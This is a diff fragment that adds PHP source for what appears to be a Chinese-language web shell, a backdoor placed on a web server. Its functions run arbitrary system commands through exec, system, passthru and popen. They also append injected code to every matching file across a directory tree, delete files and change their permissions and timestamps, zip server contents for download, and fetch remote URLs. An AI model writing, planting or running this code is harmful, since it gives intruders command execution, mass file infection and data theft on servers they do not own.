+ $SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/'));
+ return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
+}
+
+function File_Size($size)
+{
+ $kb = 1024; // Kilobyte
+ $mb = 1024 * $kb; // Megabyte
+ $gb = 1024 * $mb; // Gigabyte
+ $tb = 1024 * $gb; // Terabyte
+ if($size < $kb)
+ {
+ return $size." B";
+ }
+ else if($size < $mb)
+ {
+ return round($size/$kb,2)." K";
+ }
+ else if($size < $gb)
+ {
+ return round($size/$mb,2)." M";
+ }
+ else if($size < $tb)
+ {
+ return round($size/$gb,2)." G";
+ }
+ else
+ {
+ return round($size/$tb,2)." T";
+ }
+ }
+
+function File_Read($filename)
+{
+ $handle = @fopen($filename,"rb");
+ $filecode = @fread($handle,@filesize($filename));
+ @fclose($handle);
+ return $filecode;
+}
+
+function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}}
+function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";}
+
+function do_phpfun($cmd,$fun) {
+ $res = '';
+ switch($fun){
+ case "exec": @exec($cmd,$res); $res = join("\n",$res); break;
+ case "shell_exec": $res = @shell_exec($cmd); break;
+ case "system": @ob_start(); @system($cmd); $res = @ob_get_contents(); @ob_end_clean();break;
+ case "passthru": @ob_start(); @passthru($cmd); $res = @ob_get_contents(); @ob_end_clean();break;
+ case "popen": if(@is_resource($f = @popen($cmd,"r"))){ while(!@feof($f)) $res .= @fread($f,1024);} @pclose($f);break;
+ }
+ return $res;
+}
+
+function do_passreturn($dir,$code,$type,$bool,$filetype = '',$shell = my_shell){
+ $show = do_show($dir);
+ foreach($show as $files){
+ if(is_dir($files) && $bool){
+ do_passreturn($files,$code,$type,$bool,$filetype,$shell);
+ }else{
+ if($files == $shell) continue;
+ switch($type){
+ case "guama":
+ if(debug($files,$filetype)){
+ do_write($files,"ab","\n".$code) ? html_n("成功--> $files
") : html_n("失败--> $files
");
+ }
+ break;
+ case "qingma":
+ $filecode = @file_get_contents($files);
+ if(stristr($filecode,$code)){
+ $newcode = str_replace($code,'',$filecode);
+ do_write($files,"wb",$newcode) ? html_n("成功--> $files
") : html_n("失败--> $files
");
+ }
+ break;
+ case "tihuan":
+ $filecode = @file_get_contents($files);
+ if(stristr($filecode,$code)){
+ $newcode = str_replace($code,$filetype,$filecode);
+ do_write($files,"wb",$newcode) ? html_n("成功--> $files
") : html_n("失败--> $files
");
+ }
+ break;
+ case "scanfile":
+ $file = explode('/',$files);
+ if(stristr($file[count($file)-1],$code)){
+ html_a("?eanver=editr&p=$files",$files);
+ echo '
';
+ }
+ break;
+ case "scancode":
+ $filecode = @file_get_contents($files);
+ if(stristr($filecode,$code)){
+ html_a("?eanver=editr&p=$files",$files);
+ echo '
';
+ }
+ break;
+ case "scanphp":
+ $fileinfo = pathinfo($files);
+ if($fileinfo['extension'] == $code){
+ $filecode = @file_get_contents($files);
+ if(muma($filecode,$code)){
+ html_a("?eanver=editr&p=".urlencode($files),"编辑");
+ html_a("?eanver=del&p=".urlencode($files),"删除");
+ echo $files.'
';
+ }
+ }
+ break;
+ }
+ }
+ }
+}
+
+
+class PHPzip{
+
+ var $file_count = 0 ;
+ var $datastr_len = 0;
+ var $dirstr_len = 0;
+ var $filedata = '';
+ var $gzfilename;
+ var $fp;
+ var $dirstr='';
+
+ function unix2DosTime($unixtime = 0) {
+ $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+
+ if ($timearray['year'] < 1980) {
+ $timearray['year'] = 1980;
+ $timearray['mon'] = 1;
+ $timearray['mday'] = 1;
+ $timearray['hours'] = 0;
+ $timearray['minutes'] = 0;
+ $timearray['seconds'] = 0;
+ }
+
+ return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+ ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+ }
+
+ function startfile($path = 'QQqun555227.zip'){
+ $this->gzfilename=$path;
+ $mypathdir=array();
+ do{
+ $mypathdir[] = $path = dirname($path);
+ }while($path != '.');
+ @end($mypathdir);
+ do{
+ $path = @current($mypathdir);
+ @mkdir($path);
+ }while(@prev($mypathdir));
+
+ if($this->fp=@fopen($this->gzfilename,"w")){
+ return true;
+ }
+ return false;
+ }
+
+ function addfile($data, $name){
+ $name = str_replace('\\', '/', $name);
+
+ if(strrchr($name,'/')=='/') return $this->adddir($name);
+
+ $dtime = dechex($this->unix2DosTime());
+ $hexdtime = '\x' . $dtime[6] . $dtime[7]
+ . '\x' . $dtime[4] . $dtime[5]
+ . '\x' . $dtime[2] . $dtime[3]
+ . '\x' . $dtime[0] . $dtime[1];
+ eval('$hexdtime = "' . $hexdtime . '";');
+
+ $unc_len = strlen($data);
+ $crc = crc32($data);
+ $zdata = gzcompress($data);
+ $c_len = strlen($zdata);
+ $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+
+ $datastr = "\x50\x4b\x03\x04";
+ $datastr .= "\x14\x00";
+ $datastr .= "\x00\x00";
+ $datastr .= "\x08\x00";
+ $datastr .= $hexdtime;
+ $datastr .= pack('V', $crc);
+ $datastr .= pack('V', $c_len);
+ $datastr .= pack('V', $unc_len);
+ $datastr .= pack('v', strlen($name));
+ $datastr .= pack('v', 0);
+ $datastr .= $name;
+ $datastr .= $zdata;
+ $datastr .= pack('V', $crc);
+ $datastr .= pack('V', $c_len);
+ $datastr .= pack('V', $unc_len);
+
+
+ fwrite($this->fp,$datastr);
+ $my_datastr_len = strlen($datastr);
+ unset($datastr);
+
+ $dirstr = "\x50\x4b\x01\x02";
+ $dirstr .= "\x00\x00";
+ $dirstr .= "\x14\x00";
+ $dirstr .= "\x00\x00";
+ $dirstr .= "\x08\x00";
+ $dirstr .= $hexdtime;
+ $dirstr .= pack('V', $crc);
+ $dirstr .= pack('V', $c_len);
+ $dirstr .= pack('V', $unc_len); // uncompressed filesize
+ $dirstr .= pack('v', strlen($name) ); // length of filename
+ $dirstr .= pack('v', 0 ); // extra field length
+ $dirstr .= pack('v', 0 ); // file comment length
+ $dirstr .= pack('v', 0 ); // disk number start
+ $dirstr .= pack('v', 0 ); // internal file attributes
+ $dirstr .= pack('V', 32 ); // external file attributes - 'archive' bit set
+ $dirstr .= pack('V',$this->datastr_len ); // relative offset of local header
+ $dirstr .= $name;
+
+ $this->dirstr .= $dirstr; //目录信息
+
+ $this -> file_count ++;
+ $this -> dirstr_len += strlen($dirstr);
+ $this -> datastr_len += $my_datastr_len;
+ }
+
+ function adddir($name){
+ $name = str_replace("\\", "/", $name);
+ $datastr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
+
+ $datastr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
+ $datastr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0);
+
+ fwrite($this->fp,$datastr); //写入新的文件内容
+ $my_datastr_len = strlen($datastr);
+ unset($datastr);
+
+ $dirstr = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
+ $dirstr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
+ $dirstr .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 );
+ $dirstr .= pack("V", 16 ).pack("V",$this->datastr_len).$name;
+
+ $this->dirstr .= $dirstr; //目录信息
+
+ $this -> file_count ++;
+ $this -> dirstr_len += strlen($dirstr);
+ $this -> datastr_len += $my_datastr_len;
+ }
+
+
+ function createfile(){
+ //压缩包结束信息,包括文件总数,目录信息读取指针位置等信息
+ $endstr = "\x50\x4b\x05\x06\x00\x00\x00\x00" .
+ pack('v', $this -> file_count) .
+ pack('v', $this -> file_count) .
+ pack('V', $this -> dirstr_len) .
+ pack('V', $this -> datastr_len) .
+ "\x00\x00";
+
+ fwrite($this->fp,$this->dirstr.$endstr);
+ fclose($this->fp);
+ }
+ }
+
+function File_Act($array,$actall,$inver,$REAL_DIR)
+{
+ if(($count = count($array)) == 0) return '请选择文件';
+ if($actall == 'e')
+ {
+ function listfiles($dir=".",$faisunZIP,$mydir){
+ $sub_file_num = 0;
+ if(is_file($mydir."$dir")){
+ if(realpath($faisunZIP ->gzfilename)!=realpath($mydir."$dir")){
+ $faisunZIP -> addfile(file_get_contents($mydir.$dir),"$dir");
+ return 1;
+ }
+ return 0;
+ }
+
+ $handle=opendir($mydir."$dir");
+ while ($file = readdir($handle)) {
+ if($file=="."||$file=="..")continue;
+ if(is_dir($mydir."$dir/$file")){
+ $sub_file_num += listfiles("$dir/$file",$faisunZIP,$mydir);
+ }
+ else {
+ if(realpath($faisunZIP ->gzfilename)!=realpath($mydir."$dir/$file")){
+ $faisunZIP -> addfile(file_get_contents($mydir.$dir."/".$file),"$dir/$file");
+ $sub_file_num ++;
+ }
+ }
+ }
+ closedir($handle);
+ if(!$sub_file_num) $faisunZIP -> addfile("","$dir/");
+ return $sub_file_num;
+ }
+
+ function num_bitunit($num){
+ $bitunit=array(' B',' KB',' MB',' GB');
+ for($key=0;$key=pow(2,10*$key)-1){ //1023B 会显示为 1KB
+ $num_bitunit_str=(ceil($num/pow(2,10*$key)*100)/100)." $bitunit[$key]";
+ }
+ }
+ return $num_bitunit_str;
+ }
+
+ $mydir=$REAL_DIR.'/';
+ if(is_array($array)){
+ $faisunZIP = new PHPzip;
+ if($faisunZIP -> startfile("$inver")){
+ $filenum = 0;
+ foreach($array as $file){
+ $filenum += listfiles($file,$faisunZIP,$mydir);
+ }
+ $faisunZIP -> createfile();
+ return "压缩完成,共添加 $filenum 个文件.
点击下载 $inver (".num_bitunit(filesize("$inver")).")";
+ }else{
+ return "$inver 不能写入,请检查路径或权限是否正确.
";
+ }
+ }else{
+ return "没有选择的文件或目录.
";
+ }
+
+
+ }
+ $i = 0;
+ while($i < $count)
+ {
+ $array[$i] = urldecode($array[$i]);
+ switch($actall)
+ {
+ case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '路径错误'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = '复制到'.$inver.'目录'; break;
+ case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = '删除'; break;
+ case "c" : if(!eregi("^[0-7]{4}$",$inver)) return '属性值错误'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '属性修改为'.$inver; break;
+ case "d" : @touch($array[$i],strtotime($inver)); $msg = '修改时间为'.$inver; break;
+ }
+ $i++;
+ }
+ return '所选文件'.$msg.'完毕';
+}
+
+ function start_unzip($tmp_name,$new_name,$todir='zipfile'){
+ $z = new Zip;
+ $have_zip_file=0;
+ $upfile = array("tmp_name"=>$tmp_name,"name"=>$new_name);
+ if(is_file($upfile[tmp_name])){
+ $have_zip_file = 1;
+ echo "
正在解压: $upfile[name]
";
+ if(preg_match('/\.zip$/mis',$upfile[name])){
+ $result=$z->Extract($upfile[tmp_name],$todir);
+ if($result==-1){
+ echo "
文件 $upfile[name] 错误.
";
+ }
+ echo "
完成,共建立 $z->total_folders 个目录,$z->total_files 个文件.
";
+ }else{
+ echo "
$upfile[name] 不是 zip 文件.
";
+ }
+ if(realpath($upfile[name])!=realpath($upfile[tmp_name])){
+ @unlink($upfile[name]);
+ rename($upfile[tmp_name],$upfile[name]);
+ }
+ }
+ }
+
+function muma($filecode,$filetype){
+ $dim = array(
+ "php" => array("eval(","exec("),
+ "asp" => array("WScript.Shell","execute(","createtextfile("),
+ "aspx" => array("Response.Write(eval(","RunCMD(","CreateText()"),
+ "jsp" => array("runtime.exec(")
+ );
+ foreach($dim[$filetype] as $code){
+ if(stristr($filecode,$code)) return true;
+ }
+}
+
+function debug($file,$ftype){
+ $type=explode('|',$ftype);
+ foreach($type as $i){
+ if(stristr($file,$i)) return true;
+ }
+}
+
+/*---string---*/
+
+function str_path($path){
+ return str_replace('//','/',$path);
+}
+
+function msg($msg){
+ die("");
+}
+
+function uppath($nowpath){
+ $nowpath = str_replace('\\','/',dirname($nowpath));
+ return urlencode($nowpath);
+}
+
+function xxstr($key){
+ $temp = str_replace("\\\\","\\",$key);
+ $temp = str_replace("\\","\\\\",$temp);
+ return $temp;
+}
+
+/*---html---*/
+
+function html_ta($url,$name){
+ html_n("$name");
+}
+
+function html_a($url,$name,$where=''){
+ html_n("$name ");
+}
+
+function html_img($url){
+ html_n("![](\"?img=$url\") ");
+}
+
+function back(){
+ html_n("");
+}
+
+function html_radio($namei,$namet,$v1,$v2){
+ html_n(''.$namei);
+ html_n(''.$namet.'
');
+}
+
+function html_input($type,$name,$value = '',$text = '',$size = '',$mode = false){
+ if($mode){
+ html_n("$text");
+ }else{
+ html_n("$text ");
+ }
+}
+
+function html_text($name,$cols,$rows,$value = ''){
+ html_n("
");
+}
+
+function html_select($array,$mode = '',$change = '',$name = 'class'){
+ html_n("");
+}
+
+function html_font($color,$size,$name){
+ html_n("$name");
+}
+
+function GetHtml($url)
+{
+ $c = '';
+ $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
+ if(function_exists('fsockopen')){
+ $link = parse_url($url);
+ $query=$link['path'].'?'.$link['query'];
+ $host=strtolower($link['host']);
+ $port=$link['port'];
+ if($port==""){$port=80;}
+ $fp = fsockopen ($host,$port, $errno, $errstr, 10);
+ if ($fp)
+ {
+ $out = "GET /{$query} HTTP/1.0\r\n";
+ $out .= "Host: {$host}\r\n";
+ $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n";
+ $out .= "Connection: Close\r\n\r\n";
+ fwrite($fp, $out);
+ $inheader=1;
+ while(!feof($fp))
+ {$line=fgets($fp,4096);
+ if($inheader==0){$contents.=$line;}
+ if ($inheader &&($line=="\n"||$line=="\r\n")){$inheader = 0;}
+ }
+ fclose ($fp);
+ $c= $contents;
+ }
+ }
+ if(empty($c) && function_exists('curl_init') && function_exists('curl_exec')){
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, $url);
+ curl_setopt($ch, CURLOPT_TIMEOUT, 15);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
+ curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
+ $c = curl_exec($ch);
+ curl_close($ch);
+ }
+ if(empty($c) && ini_get('allow_url_fopen')){
+ $c = file_get_contents($url);
+ }
+ if(empty($c)){
+ echo "document.write('');";
+ }
+ if(!empty($c))
+ {
+ return $c;
+ }
+ }
+
+function html_main($path,$shellname){
+$serverip=gethostbyname($_SERVER['SERVER_NAME']);
+print<< {$shellname}
+
+END;
+ html_n(" | | |